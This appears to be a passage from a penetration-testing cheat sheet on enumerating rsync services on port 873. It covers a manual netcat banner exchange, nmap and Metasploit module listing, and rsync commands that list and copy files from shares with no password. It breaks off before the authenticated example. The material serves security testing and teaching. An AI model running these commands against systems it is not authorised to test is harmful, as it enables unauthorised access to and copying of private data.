PORT STATE SERVICE REASON
873/tcp open rsync syn-ack
信息收集
Banner & Manual communication
nc -vn 127.0.0.1 873(UNKNOWN)[127.0.0.1]873(rsync) open
@RSYNCD: 31.0 <--- You receive this banner with the version from the server
@RSYNCD: 31.0 <--- Then you send the same info
#list <--- Then you ask the sever to listraidroot <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID <--- Enumeration finished
@RSYNCD: EXIT <--- Sever closes the connection
#Now lets try to enumerate "raidroot"nc -vn 127.0.0.1 873(UNKNOWN)[127.0.0.1]873(rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
Enumerating Shared Folders
Rsync modules are recognized as directory shares that might be protected with passwords. To identify available modules and check if they require passwords, the following commands are used:
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list
## Example with IPv6 and alternate portrsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
Be aware that some shares might not appear in the list, possibly hiding them. Additionally, accessing some shares might be restricted to specific credentials, indicated by an “Access Denied” message.
Upon obtaining a module list, actions depend on whether authentication is needed. Without authentication, listing and copying files from a shared folder to a local directory is achieved through:
## Listing a shared folderrsync -av --list-only rsync://192.168.0.123/shared_name
## Copying files from a shared folderrsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
This process recursively transfers files, preserving their attributes and permissions.
With credentials, listing and downloading from a shared folder can be done as follows, where a password prompt will appear: